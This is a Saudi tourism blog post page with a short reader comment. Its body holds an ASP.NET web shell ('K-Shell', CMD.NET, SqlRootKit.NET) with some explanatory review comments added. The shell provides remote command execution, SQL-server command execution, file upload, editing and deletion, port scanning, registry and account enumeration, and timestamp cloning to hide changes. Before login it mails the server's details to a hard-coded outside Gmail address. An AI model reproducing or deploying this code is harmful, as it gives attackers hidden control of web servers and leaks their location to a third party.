مدونة السياحة
مدونة السياحة السعودية
الآثار تدل على صاحبها
<%-- Page header and action dispatcher of a browser-driven server administration page (ASP.NET Web Forms, VB). --%>
<%-- Review note: validateRequest="false" switches off ASP.NET's built-in request validation for this page, so form and query-string values reach the code unfiltered. --%>
<%-- Review note: aspcompat="true" runs the page in classic-ASP compatibility mode (presumably for COM components; the code that needs it is not on this line). --%>
<%@ Page ContentType="text/html" validateRequest="false" aspcompat="true"%>
<%-- The imports below pull in file, process, threading, socket, directory-service and registry namespaces. --%>
<%-- A page under a content site that carries this set of directives is worth flagging in file-integrity and web-root content scans. --%>
<%@ Import Namespace="System.IO" %>
<%@ import namespace="System.Diagnostics" %>
<%@ import namespace="System.Threading" %>
<%@ import namespace="System.Text" %>
<%@ import namespace="System.Security.Cryptography" %>
<%@ Import Namespace="System.Net.Sockets"%>
<%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %>
<%@ import Namespace="System.DirectoryServices" %>
<%@ import Namespace="Microsoft.Win32" %>
<%
    ' File download: served only when the session flag "rooot" equals 1.
    ' The path comes straight from the "src" query parameter; downTheFile is defined
    ' outside this line, so any path checks it may perform are not visible here.
    if request.QueryString("action")="down" and session("rooot")=1 then
        downTheFile(request.QueryString("src"))
        response.End()
    end if
    ' Map the "action" query parameter to a page title. TITLE is assigned here but
    ' declared elsewhere. The action values listed below also appear in the request
    ' URL, so web-server access logs record which function was requested.
    Dim act as string = request.QueryString("action")
    if act="cmd" then
        TITLE="CMD.NET"
    elseif act="cmdw32" then
        TITLE="ASP.NET W32 Shell"
    elseif act="cmdwsh" then
        TITLE="ASP.NET WSH Shell"
    elseif act="sqlrootkit" then
        TITLE="SqlRootKit.NET"
    elseif act="clonetime" then
        TITLE="Clone Time"
    elseif act="information" then
        TITLE="Web Server Info"
    elseif act="goto" then
        TITLE="K-Shell 1.2"
    elseif act="pro1" then
        TITLE="List processes from server"
    elseif act="pro2" then
        TITLE="List processes from server"
    elseif act="user" then
        TITLE="List User Accounts"
    elseif act="applog" then
        TITLE="List Application Event Log Entries"
    elseif act="syslog" then
        TITLE="List System Event Log Entries"
    elseif act="auser" then
        TITLE="IIS List Anonymous' User details"
    elseif act="sqlman" then
        TITLE="MSSQL Management"
    elseif act="scan" then
        TITLE="Port Scanner"
    elseif act="iisspy" then
        TITLE="IIS Spy"
    elseif act="sqltool" then
        TITLE="SQL Tool"
    elseif act="regshell" then
        TITLE="Registry Shell"
    else
        ' Any other action (or none) falls back to the requested host name.
        TITLE=request.ServerVariables("HTTP_HOST")
    end if
%>
<%
    ' Start of the page body. The outer Try and the "if" opened here are closed
    ' further down the page, not in this segment.
    Dim error_x as Exception
    Try
        ' Branch taken while the session flag "rooot" is not 1, i.e. before login.
        if session("rooot")<>1 then
            'Test sending anonymous mail, comment it if you don't want test it
            ' Review note: despite the "test" wording above, this runs for every
            ' visitor who has not logged in. It dumps the whole server-variable
            ' collection, undoes a few URL escapes for readability, and mails it
            ' through the local SMTP service to a hard-coded outside address:
            ' sender = request host, subject = host + page URL, body = the dump.
            ' The effect is that a third party learns where the page is deployed.
            ' For detection: look for the web worker handing mail to localhost SMTP,
            ' and search web roots for the recipient string used below.
            dim info As String
            Try
                info = request.ServerVariables.ToString.Replace("%2f","/").Replace("%5c","\").Replace("%3a",":").Replace("%2c",",").Replace("%3b",";").Replace("%3d","=").Replace("%2b","+").Replace("%0d%0a",vbnewline)
                System.Web.Mail.SmtpMail.SmtpServer = "localhost"
                System.Web.Mail.SmtpMail.Send(request.ServerVariables("HTTP_HOST"),"test.mail.address.2008@gmail.com",request.ServerVariables("HTTP_HOST")+request.ServerVariables("URL"),info)
            ' Empty Catch: a failed send is swallowed, so nothing is shown to the
            ' visitor and nothing is logged by the page itself.
            Catch
            End Try
%>
Your Password:
<% else dim temp as string temp=request.QueryString("action") if temp="" then temp="goto" select case temp case "goto" if request.QueryString("src")<>"" then url=request.QueryString("src") else url=server.MapPath(".") & "\" end if call existdir(url) dim xdir as directoryinfo dim mydir as new DirectoryInfo(url) dim guru as string dim xfile as fileinfo dim ServerIP As string = "Server IP : " + Request.ServerVariables("LOCAL_ADDR") + " - Client IP : " + getIP() + " - " dim HostName As string = "HostName : " + Environment.MachineName + " - Username : "+ Environment.UserName +"
" dim OSVersion As string = "OS Version : " + Environment.OSVersion.ToString() + "" dim IISversion As string = " - IIS Version : " + Request.ServerVariables("SERVER_SOFTWARE") + "
System Dir : " + Environment.SystemDirectory + "" dim PATH_INFO As string = " - PATH_TRANSLATED : " + Request.ServerVariables("PATH_TRANSLATED") + "
" dim HARDWARE_INFO As string = "" Dim environmentVariables As IDictionary = Environment.GetEnvironmentVariables() Dim de As DictionaryEntry For Each de In environmentVariables if de.Key = "NUMBER_OF_PROCESSORS" then HARDWARE_INFO += "Hardware Info : " + de.Value + "CPU - " end if if de.Key = "PROCESSOR_IDENTIFIER" then HARDWARE_INFO += de.Value + "
" end if Next Info.Text += ServerIP + HostName + OSVersion + IISversion + PATH_INFO + HARDWARE_INFO %>

Currently Dir: <%=url%>
Operate: New - <%if session("cutboard")<>"" then%> Paste - <%else%> Paste - <%end if%> UpLoad - title="Go to this file's directory">GoBackDir - Quit
Go to: <% dim i as integer for i =0 to Directory.GetLogicalDrives().length-1 response.Write("" & Directory.GetLogicalDrives(i) & " ") next %> <% response.Write("IP:" & Request.ServerVariables("REMOTE_ADDR")&"") %>
Tool: SqlRootKit.NET - CMD.NET - kshellW32 - kshellWSH - CloneTime - System Info - List Processes 1 - List Processes 2
List User Accounts - IIS Anonymous User- Port Scanner - IIS Spy - Application Event Log - System Log

" response.Write(guru) dim lll lll=1 for each xdir in mydir.getdirectories() response.Write("") dim filepath as string filepath=server.UrlEncode(url & xdir.name) if lll=1 then lll=2 else lll=1 end if guru= "" response.Write(guru) response.Write("") response.Write("") guru="" response.Write(guru) response.Write("") next %>") if lll=1 then lll=2 else lll=1 end if guru= "" response.Write(guru) guru="" response.Write(guru) response.Write("") guru="" response.Write(guru) response.Write("") next response.Write("
NameSizeModifyActions
<% guru= "
[..]
[" & xdir.name & "]" & Directory.GetLastWriteTime(url & xdir.name) & "Cut" & "|Copy|Del
<% for each xfile in mydir.getfiles() dim filepath2 as string filepath2=server.UrlEncode(url & xfile.name) response.Write("
" & xfile.name & "" & GetSize(xfile.length) & "" & file.GetLastWriteTime(url & xfile.name) & "Edit|Cut|Copy|Rename|Download|Del
") %>
<% case "information" dim CIP,CP as string if getIP()<>request.ServerVariables("REMOTE_ADDR") then CIP=getIP() CP=request.ServerVariables("REMOTE_ADDR") else CIP=request.ServerVariables("REMOTE_ADDR") CP="None" end if %>
[ Web Server Information ]        Back

Server IP <%=request.ServerVariables("LOCAL_ADDR")%>
Machine Name <%=Environment.MachineName%>
Network Name <%=Environment.UserDomainName.ToString()%>
User Name in this Process <%=Environment.UserName%>
OS Version <%=Environment.OSVersion.ToString()%>
Started Time <%=GetStartedTime(Environment.Tickcount)%> Hours
System Time <%=now%>
IIS Version <%=request.ServerVariables("SERVER_SOFTWARE")%>
HTTPS <%=request.ServerVariables("HTTPS")%>
PATH_INFO <%=request.ServerVariables("PATH_INFO")%>
PATH_TRANSLATED <%=request.ServerVariables("PATH_TRANSLATED")%>
SERVER_PORT <%=request.ServerVariables("SERVER_PORT")%>
SeesionID <%=Session.SessionID%>
Client Infomation
Client Proxy <%=CP%>
Client IP <%=CIP%>
User <%=request.ServerVariables("HTTP_USER_AGENT")%>
<% Create_table_row_with_supplied_colors("Black", "White", "center", "Environment Variables, Server Variables") %>
<% case "cmd" %>

[ CMD.NET for WebAdmin ]        Back

Execute command with ASP.NET account(Notice: only click "Run" to run)

- This function has fixed by kikicoco.Antivirus has not detected (2007/02/27)-

Command:

<% case "cmdw32" %>

[ ASP.NET W32 Shell ]        Back

Execute command with ASP.NET account using W32(Notice: only click "Run" to run)

<% Response.Write("System Dir : "+Environment.SystemDirectory +"

") %> CMD File: C:\\WINDOWS\\system32\\cmd.exe

Command: 

<% case "cmdwsh" %>

[ ASP.NET WSH Shell ]        Back

Execute command with ASP.NET account using WSH(Notice: only click "Run" to run)

Command:

<% case "pro1" %>

[ List processes from server ]        Back

<% Try output_wmi_function_data("Win32_Process","ProcessId,Name,WorkingSetSize,HandleCount") Catch rw("This function is disabled by server") End Try %>
<% case "pro2" %>

[ List processes from server ]        Back

" prostr += "" prostr += "" prostr += "" Next Catch ex As Exception Response.write(ex.Message) End Try Response.write(htmlbengin + prostr + htmlend) %>
<% Dim htmlbengin As String = "" Dim prostr As String = "" Dim htmlend As String = "
IDProcessMemorySizeThreads
" Try Dim mypro As Process() = Process.GetProcesses() For Each p As Process In mypro prostr += "
" + p.Id.ToString() + "" + p.ProcessName.ToString() + "" + p.WorkingSet.ToString() + "" + p.Threads.Count.ToString() + "
<% case "user" %>

[ List User Accounts ]        Back

<% dim WMI_function = "Win32_UserAccount" dim Fields_to_load = "Name,Domain,FullName,Description,PasswordRequired,SID" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data(WMI_function,Fields_to_load) Catch rw(fail_description) End Try %>
<% case "reg" %>

[ Registry ]        Back

<% dim WMI_function = "Win32_Registry" dim Fields_to_load = "Caption,CurrentSize,Description,InstallDate,Name,Status" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data(WMI_function,Fields_to_load) Catch rw(fail_description) End Try %>
<% case "applog" %>

[ List Application Event Log Entries ]        Back

<% dim WMI_function = "Win32_NTLogEvent where Logfile='Application'" dim Fields_to_load = "Logfile,Message,type" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data_instances(WMI_function,Fields_to_load,2000) Catch rw(fail_description) End Try %>
<% case "syslog" %>

[ List System Event Log Entries ]        Back

<% dim WMI_function = "Win32_NTLogEvent where Logfile='System'" dim Fields_to_load = "Logfile,Message,type" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data_instances(WMI_function,Fields_to_load,2000) Catch rw("This function is disabled by server") End Try %>
<% case "auser" %>

[ IIS List Anonymous' User details ]        Back

<% Try IIS_list_Anon_Name_Pass Catch rw("This function is disabled by server") End Try %>
<% case "scan" %>

[ ASP.NET Port Scanner ]        Back

C# coded by Hackwol & Lenk, VB coded by kikicoco (19/08/2008)

Start IP :  127.0.0.1      ---  End Ip :  127.0.0.1 
Ports    :  21,25,80,1433,3306,3389

  




<% case "iisspy" %>

[ IIS Spy ]        Back

<% Try Response.write(IISSpy()) Catch rw("This function is disabled by server") End Try %> <% case "sqltool" %>

[ SQL Tool ]        Back

<% Try Catch rw("This function is disabled by server") End Try %> <% case "regshell" %>

[ Registry Shell ]        Back

Key:   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName

Value: ComputerName  

<% case "sqlman" %>

[ MSSQL Query ]        Back

Execute query with SQLServer account(Notice: only click "Run" to run)

Host:

SQL Name: SQL Password:

Command:

<% case "sqlrootkit" %>

[ SqlRootKit.NET for WebAdmin ]        Back

Execute command with SQLServer account(Notice: only click "Run" to run)

Host:

SQL Name: SQL Password:

Command:

<% case "del" dim a as string a=request.QueryString("src") call existdir(a) call del(a) response.Write("") case "copy" call existdir(request.QueryString("src")) session("cutboard")="" & request.QueryString("src") response.Write("") case "cut" call existdir(request.QueryString("src")) session("cutboard")="" & request.QueryString("src") response.Write("") case "paste" dim ow as integer if request.Form("OverWrite")<>"" then ow=1 if request.Form("Cancel")<>"" then ow=2 url=request.QueryString("src") call existdir(url) dim d as string d=session("cutboard") if left(d,1)="" then TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1)) TEMP2=url & replace(path.getfilename(d),"","") if right(d,1)="\" then call xexistdir(TEMP1,ow) directory.move(replace(d,"",""),TEMP1 & "\") response.Write("") else call xexistdir(TEMP2,ow) file.move(replace(d,"",""),TEMP2) response.Write("") end if else TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1)) TEMP2=url & path.getfilename(replace(d,"","")) if right(d,1)="\" then call xexistdir(TEMP1,ow) directory.createdirectory(TEMP1) call copydir(replace(d,"",""),TEMP1 & "\") response.Write("") else call xexistdir(TEMP2,ow) file.copy(replace(d,"",""),TEMP2) response.Write("") end if end if case "upfile" url=request.QueryString("src") %>
You will upload file to this directory : <%=url%>
Please choose file from your computer :
Go Back <% case "new" url=request.QueryString("src") %>
<%=url%>
Name:

Go Back <% case "edit" dim b as string b=request.QueryString("src") call existdir(b) dim myread as new streamreader(b,encoding.default) filepath.text=b content.text=myread.readtoend %>
Path *
Content
Go Back <% myread.close case "rename" url=request.QueryString("src") if request.Form("name")="" then %>
" onSubmit="return checkname();">

You will rename <%=request.QueryString("src")%>to: <%=getparentdir(request.QueryString("src"))%>

Go Back <% else if Rename() then response.Write("") else response.Write("") end if end if case "samename" url=request.QueryString("src") %>

Exist the same name file , can you overwrite ?(If you click " no" , it will auto add a number as prefix)

Go Back <% case "clonetime" time1.Text=request.QueryString("src")&"kshell.aspx" time2.Text=request.QueryString("src") %>

[CloneTime for WebAdmin]      Back

A tool that it copy the file or directory's time to another file or directory

Rework File or Dir:

Copied File or Dir:     

<% case "logout" session.Abandon() response.Write("

بواسطة - مدير المدونة
التعليقات0
تاريخ النشرWednesday, February 19, 2014
التعليقات
"الآثار تدل على صاحبها" فعلاً جملة قصيرة تختصر الكثير. جميع باحثي الآثار سيتفقون مع هذه المقولة لأن كل أعمالهم الآثارية هي لمعرفة أهل الآثار وتاريخهم وحياتهم والكثير من التفاصيل من خلال الآثار. جملة تصدر من رجل الإدارة والحكمة والحكم. حفظ الله سمو ولي العهد الأمين.
بواسطة -11111111111Hamad AlSheikh
تاريخ التعليقMonday, February 24, 2014